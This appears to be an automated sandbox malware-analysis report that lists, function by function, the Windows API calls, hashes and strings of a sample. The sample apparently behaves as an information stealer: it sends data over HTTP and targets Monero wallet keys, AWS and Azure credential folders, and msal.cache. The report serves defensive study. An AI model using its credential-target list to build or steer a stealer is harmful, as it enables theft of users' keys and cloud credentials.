                  • Instruction ID: 75a562f17810a13c2e3fae5162afe9ffd34af8f4b3a569998eb7b7e93a3ce934
                  • Opcode Fuzzy Hash: 26c2f9d3d03ae70480ca0caed7690a34bedf5fc1f157af2dd91d20a6888adf68
                  • Instruction Fuzzy Hash: 13D10C71D00208ABDB04EBF4DE96FEE777DAF94710F504518F102AB091EE74AA46CB66
                  Function 009A5960 Relevance: 39.0, APIs: 17, Strings: 5, Instructions: 495networkstringmemoryCOMMON
                  Download Yara Rule
                  APIs
                    • Part of subcall function 009BA7A0: lstrcpy.KERNEL32(?,00000000), ref: 009BA7E6
                    • Part of subcall function 009A47B0: lstrlen.KERNEL32(00000000,00000000,0000003C), ref: 009A4839
                    • Part of subcall function 009A47B0: InternetCrackUrlA.WININET(00000000,00000000), ref: 009A4849
                    • Part of subcall function 009BA740: lstrcpy.KERNEL32(009C0E17,00000000), ref: 009BA788
                  • InternetOpenA.WININET(00000000,00000001,00000000,00000000,00000000), ref: 009A59F8
                  • StrCmpCA.SHLWAPI(?,015EF828), ref: 009A5A13
                  • InternetConnectA.WININET(00000000,?,?,00000000,00000000,00000003,00000000,00000000), ref: 009A5B93
                  • lstrlen.KERNEL32(00000000,00000000,?,00000000,00000000,?,",00000000,?,015EF818,00000000,?,015EB338,00000000,?,009C1A1C), ref: 009A5E71
                  • lstrlen.KERNEL32(00000000), ref: 009A5E82
                  • GetProcessHeap.KERNEL32(00000000,?), ref: 009A5E93
                  • RtlAllocateHeap.NTDLL(00000000), ref: 009A5E9A
                  • lstrlen.KERNEL32(00000000), ref: 009A5EAF
                  • lstrlen.KERNEL32(00000000), ref: 009A5ED8
                  • lstrlen.KERNEL32(00000000,00000000,00000000), ref: 009A5EF1
                  • lstrlen.KERNEL32(00000000,?,?), ref: 009A5F1B
                  • HttpSendRequestA.WININET(00000000,00000000,00000000), ref: 009A5F2F
                  • InternetReadFile.WININET(00000000,?,000000C7,?), ref: 009A5F4C
                  • InternetCloseHandle.WININET(00000000), ref: 009A5FB0
                  • InternetCloseHandle.WININET(00000000), ref: 009A5FBD
                  • HttpOpenRequestA.WININET(00000000,015EF6B8,?,015EEEA8,00000000,00000000,00400100,00000000), ref: 009A5BF8
                    • Part of subcall function 009BA9B0: lstrlen.KERNEL32(?,015E9EF8,?,\Monero\wallet.keys,009C0E17), ref: 009BA9C5
                    • Part of subcall function 009BA9B0: lstrcpy.KERNEL32(00000000), ref: 009BAA04
                    • Part of subcall function 009BA9B0: lstrcat.KERNEL32(00000000,00000000), ref: 009BAA12
                    • Part of subcall function 009BA8A0: lstrcpy.KERNEL32(?,009C0E17), ref: 009BA905
                    • Part of subcall function 009BA920: lstrcpy.KERNEL32(00000000,?), ref: 009BA972
                    • Part of subcall function 009BA920: lstrcat.KERNEL32(00000000), ref: 009BA982
                  • InternetCloseHandle.WININET(00000000), ref: 009A5FC7
                  Strings
                  Memory Dump Source
                  • Source File: 00000000.00000002.1771028877.00000000009A1000.00000040.00000001.01000000.00000003.sdmp, Offset: 009A0000, based on PE: true
                  • Associated: 00000000.00000002.1771003555.00000000009A0000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1771028877.0000000000A51000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1771028877.0000000000A5D000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1771028877.0000000000A82000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1771028877.0000000000BEA000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1771226326.0000000000BFE000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1771226326.0000000000D7B000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1771226326.0000000000E4A000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1771226326.0000000000E6D000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1771226326.0000000000E73000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1771226326.0000000000E82000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1771523665.0000000000E83000.00000080.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1771647773.000000000100E000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1771667968.000000000100F000.00000080.00000001.01000000.00000003.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_9a0000_file.jbxd
                  Yara matches
                  Similarity
                  • API ID: lstrlen$Internet$lstrcpy$CloseHandle$HeapHttpOpenRequestlstrcat$AllocateConnectCrackFileProcessReadSend
                  • String ID: "$"$------$------$------
                  • API String ID: 874700897-2180234286
                  • Opcode ID: 377fe90d2592de7f3aced8bfeeed9903bf85876634931aff747cd63193a39f54
                  • Instruction ID: a4c0c84ecb389e0b6b72fc3b471b08baf86c33e273fff9ff7ac164ee32b72453
                  • Opcode Fuzzy Hash: 377fe90d2592de7f3aced8bfeeed9903bf85876634931aff747cd63193a39f54
                  • Instruction Fuzzy Hash: 45122B72820118BADB15EBA0DDA5FEEB37CBF94710F404199B10663491EF702A4ACF66
                  Function 009ACEF0 Relevance: 30.4, APIs: 20, Instructions: 375stringmemoryfileCOMMON
                  Download Yara Rule
                  APIs
                    • Part of subcall function 009BA740: lstrcpy.KERNEL32(009C0E17,00000000), ref: 009BA788
                    • Part of subcall function 009BA9B0: lstrlen.KERNEL32(?,015E9EF8,?,\Monero\wallet.keys,009C0E17), ref: 009BA9C5
                    • Part of subcall function 009BA9B0: lstrcpy.KERNEL32(00000000), ref: 009BAA04
                    • Part of subcall function 009BA9B0: lstrcat.KERNEL32(00000000,00000000), ref: 009BAA12
                    • Part of subcall function 009BA8A0: lstrcpy.KERNEL32(?,009C0E17), ref: 009BA905
                    • Part of subcall function 009B8B60: GetSystemTime.KERNEL32(009C0E1A,015EB008,009C05AE,?,?,009A13F9,?,0000001A,009C0E1A,00000000,?,015E9EF8,?,\Monero\wallet.keys,009C0E17), ref: 009B8B86
                    • Part of subcall function 009BA920: lstrcpy.KERNEL32(00000000,?), ref: 009BA972
                    • Part of subcall function 009BA920: lstrcat.KERNEL32(00000000), ref: 009BA982
                  • CopyFileA.KERNEL32(00000000,00000000,00000001), ref: 009ACF83
                  • GetProcessHeap.KERNEL32(00000000,05F5E0FF), ref: 009AD0C7
                  • RtlAllocateHeap.NTDLL(00000000), ref: 009AD0CE
                  • lstrcat.KERNEL32(?,00000000), ref: 009AD208
                  • lstrcat.KERNEL32(?,009C1478), ref: 009AD217
                  • lstrcat.KERNEL32(?,00000000), ref: 009AD22A
                  • lstrcat.KERNEL32(?,009C147C), ref: 009AD239
                  • lstrcat.KERNEL32(?,00000000), ref: 009AD24C
                  • lstrcat.KERNEL32(?,009C1480), ref: 009AD25B
                  • lstrcat.KERNEL32(?,00000000), ref: 009AD26E
                  • lstrcat.KERNEL32(?,009C1484), ref: 009AD27D
                  • lstrcat.KERNEL32(?,00000000), ref: 009AD290
                  • lstrcat.KERNEL32(?,009C1488), ref: 009AD29F
                  • lstrcat.KERNEL32(?,00000000), ref: 009AD2B2
                  • lstrcat.KERNEL32(?,009C148C), ref: 009AD2C1
                  • lstrcat.KERNEL32(?,00000000), ref: 009AD2D4
                  • lstrcat.KERNEL32(?,009C1490), ref: 009AD2E3
                    • Part of subcall function 009BA820: lstrlen.KERNEL32(009A4F05,?,?,009A4F05,009C0DDE), ref: 009BA82B
                    • Part of subcall function 009BA820: lstrcpy.KERNEL32(009C0DDE,00000000), ref: 009BA885
                  • lstrlen.KERNEL32(?), ref: 009AD32A
                  • lstrlen.KERNEL32(?), ref: 009AD339
                    • Part of subcall function 009BAA70: StrCmpCA.SHLWAPI(015E9D18,009AA7A7,?,009AA7A7,015E9D18), ref: 009BAA8F
                  • DeleteFileA.KERNEL32(00000000), ref: 009AD3B4
                  Memory Dump Source
                  • Source File: 00000000.00000002.1771028877.00000000009A1000.00000040.00000001.01000000.00000003.sdmp, Offset: 009A0000, based on PE: true
                  • Associated: 00000000.00000002.1771003555.00000000009A0000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1771028877.0000000000A51000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1771028877.0000000000A5D000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1771028877.0000000000A82000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1771028877.0000000000BEA000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1771226326.0000000000BFE000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1771226326.0000000000D7B000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1771226326.0000000000E4A000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1771226326.0000000000E6D000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1771226326.0000000000E73000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1771226326.0000000000E82000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1771523665.0000000000E83000.00000080.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1771647773.000000000100E000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1771667968.000000000100F000.00000080.00000001.01000000.00000003.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_9a0000_file.jbxd
                  Yara matches
                  Similarity
                  • API ID: lstrcat$lstrcpy$lstrlen$FileHeap$AllocateCopyDeleteProcessSystemTime
                  • String ID:
                  • API String ID: 1956182324-0
                  • Opcode ID: 5821b000c648c4b65ed50ff4e900960dea34ebe8bb5698e73792c682e4c925f9
                  • Instruction ID: a1366cb444498ad83052928f9957d7269877099377e60f0e15222223202ffb9a
                  • Opcode Fuzzy Hash: 5821b000c648c4b65ed50ff4e900960dea34ebe8bb5698e73792c682e4c925f9
                  • Instruction Fuzzy Hash: EFE10A71910108ABDB18EBA0DE96FEE737DAF94711F104158F106B70A1DE35BE09CBA6
                  Function 009A4880 Relevance: 28.5, APIs: 11, Strings: 5, Instructions: 479networkstringfileCOMMON
                  Download Yara Rule
                  APIs
                    • Part of subcall function 009BA7A0: lstrcpy.KERNEL32(?,00000000), ref: 009BA7E6
                    • Part of subcall function 009A47B0: lstrlen.KERNEL32(00000000,00000000,0000003C), ref: 009A4839
                    • Part of subcall function 009A47B0: InternetCrackUrlA.WININET(00000000,00000000), ref: 009A4849
                    • Part of subcall function 009BA740: lstrcpy.KERNEL32(009C0E17,00000000), ref: 009BA788
                  • InternetOpenA.WININET(00000000,00000001,00000000,00000000,00000000), ref: 009A4915
                  • StrCmpCA.SHLWAPI(?,015EF828), ref: 009A493A
                  • InternetConnectA.WININET(00000000,?,?,00000000,00000000,00000003,00000000,00000000), ref: 009A4ABA
                  • lstrlen.KERNEL32(00000000,00000000,?,?,?,?,009C0DDB,00000000,?,?,00000000,?,",00000000,?,015EF7E8), ref: 009A4DE8
                  • lstrlen.KERNEL32(00000000,00000000,00000000), ref: 009A4E04
                  • HttpSendRequestA.WININET(00000000,00000000,00000000), ref: 009A4E18
                  • InternetReadFile.WININET(00000000,?,000007CF,?), ref: 009A4E49
                  • InternetCloseHandle.WININET(00000000), ref: 009A4EAD
                  • InternetCloseHandle.WININET(00000000), ref: 009A4EC5
                  • HttpOpenRequestA.WININET(00000000,015EF6B8,?,015EEEA8,00000000,00000000,00400100,00000000), ref: 009A4B15
                    • Part of subcall function 009BA9B0: lstrlen.KERNEL32(?,015E9EF8,?,\Monero\wallet.keys,009C0E17), ref: 009BA9C5
                    • Part of subcall function 009BA9B0: lstrcpy.KERNEL32(00000000), ref: 009BAA04
                    • Part of subcall function 009BA9B0: lstrcat.KERNEL32(00000000,00000000), ref: 009BAA12
                    • Part of subcall function 009BA8A0: lstrcpy.KERNEL32(?,009C0E17), ref: 009BA905
                    • Part of subcall function 009BA920: lstrcpy.KERNEL32(00000000,?), ref: 009BA972
                    • Part of subcall function 009BA920: lstrcat.KERNEL32(00000000), ref: 009BA982
                  • InternetCloseHandle.WININET(00000000), ref: 009A4ECF
                  Strings
                  Memory Dump Source
                  • Source File: 00000000.00000002.1771028877.00000000009A1000.00000040.00000001.01000000.00000003.sdmp, Offset: 009A0000, based on PE: true
                  • Associated: 00000000.00000002.1771003555.00000000009A0000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1771028877.0000000000A51000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1771028877.0000000000A5D000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1771028877.0000000000A82000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1771028877.0000000000BEA000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1771226326.0000000000BFE000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1771226326.0000000000D7B000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1771226326.0000000000E4A000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1771226326.0000000000E6D000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1771226326.0000000000E73000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1771226326.0000000000E82000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1771523665.0000000000E83000.00000080.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1771647773.000000000100E000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1771667968.000000000100F000.00000080.00000001.01000000.00000003.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_9a0000_file.jbxd
                  Yara matches
                  Similarity
                  • API ID: Internet$lstrcpy$lstrlen$CloseHandle$HttpOpenRequestlstrcat$ConnectCrackFileReadSend
                  • String ID: "$"$------$------$------
                  • API String ID: 460715078-2180234286
                  • Opcode ID: cdcc9da5f8210f1c960865016fb61360dd18fe4fa161feddf4122219525181a6
                  • Instruction ID: 2826eaae7ec313549a67e0407c47fdba98c4bf56c51a4f12530cb6dbbe044442
                  • Opcode Fuzzy Hash: cdcc9da5f8210f1c960865016fb61360dd18fe4fa161feddf4122219525181a6
                  • Instruction Fuzzy Hash: 48120B72910218AADB15EB90DEA2FEEB338BF94710F504199B10677491EF702F49CF66
                  Function 009AC990 Relevance: 24.9, APIs: 13, Strings: 1, Instructions: 384filestringCOMMON
                  Download Yara Rule
                  APIs
                    • Part of subcall function 009BA740: lstrcpy.KERNEL32(009C0E17,00000000), ref: 009BA788
                    • Part of subcall function 009BA920: lstrcpy.KERNEL32(00000000,?), ref: 009BA972
                    • Part of subcall function 009BA920: lstrcat.KERNEL32(00000000), ref: 009BA982
                    • Part of subcall function 009BA8A0: lstrcpy.KERNEL32(?,009C0E17), ref: 009BA905
                    • Part of subcall function 009BA9B0: lstrlen.KERNEL32(?,015E9EF8,?,\Monero\wallet.keys,009C0E17), ref: 009BA9C5
                    • Part of subcall function 009BA9B0: lstrcpy.KERNEL32(00000000), ref: 009BAA04
                    • Part of subcall function 009BA9B0: lstrcat.KERNEL32(00000000,00000000), ref: 009BAA12
                  • CreateFileA.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000000,00000000,00000000,?,015EE288,00000000,?,009C144C,00000000,?,?), ref: 009ACA6C
                  • SetFilePointer.KERNEL32(00000000,00000000,00000000,00000002), ref: 009ACA89
                  • GetFileSize.KERNEL32(00000000,00000000), ref: 009ACA95
                  • SetFilePointer.KERNEL32(00000000,00000000,00000000,00000000), ref: 009ACAA8
                  • ReadFile.KERNEL32(00000000,?,00000000,?,00000000), ref: 009ACAD9
                  • StrStrA.SHLWAPI(?,015EE330,009C0B52), ref: 009ACAF7
                  • StrStrA.SHLWAPI(00000000,015EE2E8), ref: 009ACB1E
                  • StrStrA.SHLWAPI(?,015EE488,00000000,?,009C1458,00000000,?,00000000,00000000,?,015E9C58,00000000,?,009C1454,00000000,?), ref: 009ACCA2
                  • StrStrA.SHLWAPI(00000000,015EE648), ref: 009ACCB9
                    • Part of subcall function 009AC820: lstrlen.KERNEL32(?,00000001,?,00000000,00000000,00000000), ref: 009AC871
                    • Part of subcall function 009AC820: CryptStringToBinaryA.CRYPT32(?,00000000), ref: 009AC87C
                  • StrStrA.SHLWAPI(?,015EE648,00000000,?,009C145C,00000000,?,00000000,015E9CA8), ref: 009ACD5A
                  • StrStrA.SHLWAPI(00000000,015E9DF8), ref: 009ACD71
                    • Part of subcall function 009AC820: lstrcat.KERNEL32(?,009C0B46), ref: 009AC943
                    • Part of subcall function 009AC820: lstrcat.KERNEL32(?,009C0B47), ref: 009AC957
                    • Part of subcall function 009AC820: lstrcat.KERNEL32(?,009C0B4E), ref: 009AC978
                  • lstrlen.KERNEL32(00000000), ref: 009ACE44
                  • CloseHandle.KERNEL32(00000000), ref: 009ACE9C
                  Strings
                  Memory Dump Source
                  • Source File: 00000000.00000002.1771028877.00000000009A1000.00000040.00000001.01000000.00000003.sdmp, Offset: 009A0000, based on PE: true
                  • Associated: 00000000.00000002.1771003555.00000000009A0000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1771028877.0000000000A51000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1771028877.0000000000A5D000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1771028877.0000000000A82000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1771028877.0000000000BEA000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1771226326.0000000000BFE000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1771226326.0000000000D7B000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1771226326.0000000000E4A000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1771226326.0000000000E6D000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1771226326.0000000000E73000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1771226326.0000000000E82000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1771523665.0000000000E83000.00000080.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1771647773.000000000100E000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1771667968.000000000100F000.00000080.00000001.01000000.00000003.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_9a0000_file.jbxd
                  Yara matches
                  Similarity
                  • API ID: Filelstrcat$lstrcpy$lstrlen$Pointer$BinaryCloseCreateCryptHandleReadSizeString
                  • String ID:
                  • API String ID: 3744635739-3916222277
                  • Opcode ID: a004e8f72eeb323d373986262dcadc839a50546ff43e00258c8be063e09e25e5
                  • Instruction ID: 2187d6a506e92470ac96e79c36d77d4cb1d2c941c0101d6277cea309916600fc
                  • Opcode Fuzzy Hash: a004e8f72eeb323d373986262dcadc839a50546ff43e00258c8be063e09e25e5
                  • Instruction Fuzzy Hash: 5EE10B71D00108BBDB14EBA4DD92FEEB778AF94710F404159F106A7591EF307A4ACBA6
                  Function 009B8320 Relevance: 24.7, APIs: 11, Strings: 3, Instructions: 196registryCOMMON
                  Download Yara Rule
                  APIs
                    • Part of subcall function 009BA740: lstrcpy.KERNEL32(009C0E17,00000000), ref: 009BA788
                  • RegOpenKeyExA.ADVAPI32(00000000,015EC210,00000000,00020019,00000000,009C05B6), ref: 009B83A4
                  • RegEnumKeyExA.ADVAPI32(00000000,00000000,?,00000400,00000000,00000000,00000000,00000000), ref: 009B8426
                  • wsprintfA.USER32 ref: 009B8459
                  • RegOpenKeyExA.ADVAPI32(00000000,?,00000000,00020019,00000000), ref: 009B847B
                  • RegCloseKey.ADVAPI32(00000000), ref: 009B848C
                  • RegCloseKey.ADVAPI32(00000000), ref: 009B8499
                    • Part of subcall function 009BA7A0: lstrcpy.KERNEL32(?,00000000), ref: 009BA7E6
                  Strings
                  Memory Dump Source
                  • Source File: 00000000.00000002.1771028877.00000000009A1000.00000040.00000001.01000000.00000003.sdmp, Offset: 009A0000, based on PE: true
                  • Associated: 00000000.00000002.1771003555.00000000009A0000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1771028877.0000000000A51000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1771028877.0000000000A5D000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1771028877.0000000000A82000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1771028877.0000000000BEA000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1771226326.0000000000BFE000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1771226326.0000000000D7B000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1771226326.0000000000E4A000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1771226326.0000000000E6D000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1771226326.0000000000E73000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1771226326.0000000000E82000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1771523665.0000000000E83000.00000080.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1771647773.000000000100E000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1771667968.000000000100F000.00000080.00000001.01000000.00000003.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_9a0000_file.jbxd
                  Yara matches
                  Similarity
                  • API ID: CloseOpenlstrcpy$Enumwsprintf
                  • String ID: - $%s\%s$?
                  • API String ID: 3246050789-3278919252
                  • Opcode ID: ce3afd5307460facc7e771ca5f15de4fef5def0526e59351fb897463e55e421f
                  • Instruction ID: 2542af22dffac5bdf6aa5830fb16fe03c2ba41e02fd2895903f8b43cb64f798b
                  • Opcode Fuzzy Hash: ce3afd5307460facc7e771ca5f15de4fef5def0526e59351fb897463e55e421f
                  • Instruction Fuzzy Hash: 8C8108B191011CABEB28DB50CD95FEAB7BCBF48710F008699E109A6180DF756F85CFA5
                  Function 009B4D70 Relevance: 22.6, APIs: 6, Strings: 9, Instructions: 123stringCOMMON
                  Download Yara Rule
                  APIs
                    • Part of subcall function 009B8DE0: SHGetFolderPathA.SHELL32(00000000,0000001C,00000000,00000000,?,?,000003E8), ref: 009B8E0B
                  • lstrcat.KERNEL32(?,00000000), ref: 009B4DB0
                  • lstrcat.KERNEL32(?,\.azure\), ref: 009B4DCD
                    • Part of subcall function 009B4910: wsprintfA.USER32 ref: 009B492C
                    • Part of subcall function 009B4910: FindFirstFileA.KERNEL32(?,?), ref: 009B4943
                  • lstrcat.KERNEL32(?,00000000), ref: 009B4E3C
                  • lstrcat.KERNEL32(?,\.aws\), ref: 009B4E59
                    • Part of subcall function 009B4910: StrCmpCA.SHLWAPI(?,009C0FDC), ref: 009B4971
                    • Part of subcall function 009B4910: StrCmpCA.SHLWAPI(?,009C0FE0), ref: 009B4987
                    • Part of subcall function 009B4910: FindNextFileA.KERNEL32(000000FF,?), ref: 009B4B7D
                    • Part of subcall function 009B4910: FindClose.KERNEL32(000000FF), ref: 009B4B92
                  • lstrcat.KERNEL32(?,00000000), ref: 009B4EC8
                  • lstrcat.KERNEL32(?,\.IdentityService\), ref: 009B4EE5
                    • Part of subcall function 009B4910: wsprintfA.USER32 ref: 009B49B0
                    • Part of subcall function 009B4910: StrCmpCA.SHLWAPI(?,009C08D2), ref: 009B49C5
                    • Part of subcall function 009B4910: wsprintfA.USER32 ref: 009B49E2
                    • Part of subcall function 009B4910: PathMatchSpecA.SHLWAPI(?,?), ref: 009B4A1E
                    • Part of subcall function 009B4910: lstrcat.KERNEL32(?,015EF678), ref: 009B4A4A
                    • Part of subcall function 009B4910: lstrcat.KERNEL32(?,009C0FF8), ref: 009B4A5C
                    • Part of subcall function 009B4910: lstrcat.KERNEL32(?,?), ref: 009B4A70
                    • Part of subcall function 009B4910: lstrcat.KERNEL32(?,009C0FFC), ref: 009B4A82
                    • Part of subcall function 009B4910: lstrcat.KERNEL32(?,?), ref: 009B4A96
                    • Part of subcall function 009B4910: CopyFileA.KERNEL32(?,?,00000001), ref: 009B4AAC
                    • Part of subcall function 009B4910: DeleteFileA.KERNEL32(?), ref: 009B4B31
                  Strings
                  Memory Dump Source
                  • Source File: 00000000.00000002.1771028877.00000000009A1000.00000040.00000001.01000000.00000003.sdmp, Offset: 009A0000, based on PE: true
                  • Associated: 00000000.00000002.1771003555.00000000009A0000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1771028877.0000000000A51000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1771028877.0000000000A5D000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1771028877.0000000000A82000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1771028877.0000000000BEA000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1771226326.0000000000BFE000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1771226326.0000000000D7B000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1771226326.0000000000E4A000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1771226326.0000000000E6D000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1771226326.0000000000E73000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1771226326.0000000000E82000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1771523665.0000000000E83000.00000080.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1771647773.000000000100E000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1771667968.000000000100F000.00000080.00000001.01000000.00000003.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_9a0000_file.jbxd
                  Yara matches
                  Similarity
                  • API ID: lstrcat$File$Findwsprintf$Path$CloseCopyDeleteFirstFolderMatchNextSpec
                  • String ID: *.*$*.*$Azure\.IdentityService$Azure\.aws$Azure\.azure$\.IdentityService\$\.aws\$\.azure\$msal.cache
                  • API String ID: 949356159-974132213
                  • Opcode ID: a917d53f016b97e9345fef9a336354aaab36de6d4c81bacc5326a35543c8bc91
                  • Instruction ID: b4ff62d9d83ce934749b0629f71e23b681edc04ac713952e5f9d3e3cd1464633
                  • Opcode Fuzzy Hash: a917d53f016b97e9345fef9a336354aaab36de6d4c81bacc5326a35543c8bc91
                  • Instruction Fuzzy Hash: EA41747AD4020867DB10F760DD87FED733CABA5704F404558B585A60C2EEB4ABC98B93
                  Function 009B9010 Relevance: 21.2, APIs: 11, Strings: 1, Instructions: 184COMMON
                  Download Yara Rule
                  APIs
                  • CreateStreamOnHGlobal.COMBASE(00000000,00000001,?), ref: 009B906C
                  Strings
                  Memory Dump Source
                  • Source File: 00000000.00000002.1771028877.00000000009A1000.00000040.00000001.01000000.00000003.sdmp, Offset: 009A0000, based on PE: true
                  • Associated: 00000000.00000002.1771003555.00000000009A0000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1771028877.0000000000A51000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1771028877.0000000000A5D000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1771028877.0000000000A82000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1771028877.0000000000BEA000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1771226326.0000000000BFE000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1771226326.0000000000D7B000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1771226326.0000000000E4A000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1771226326.0000000000E6D000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1771226326.0000000000E73000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1771226326.0000000000E82000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1771523665.0000000000E83000.00000080.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1771647773.000000000100E000.00000040.00000001.01000000.00000003.sdmpDownload File
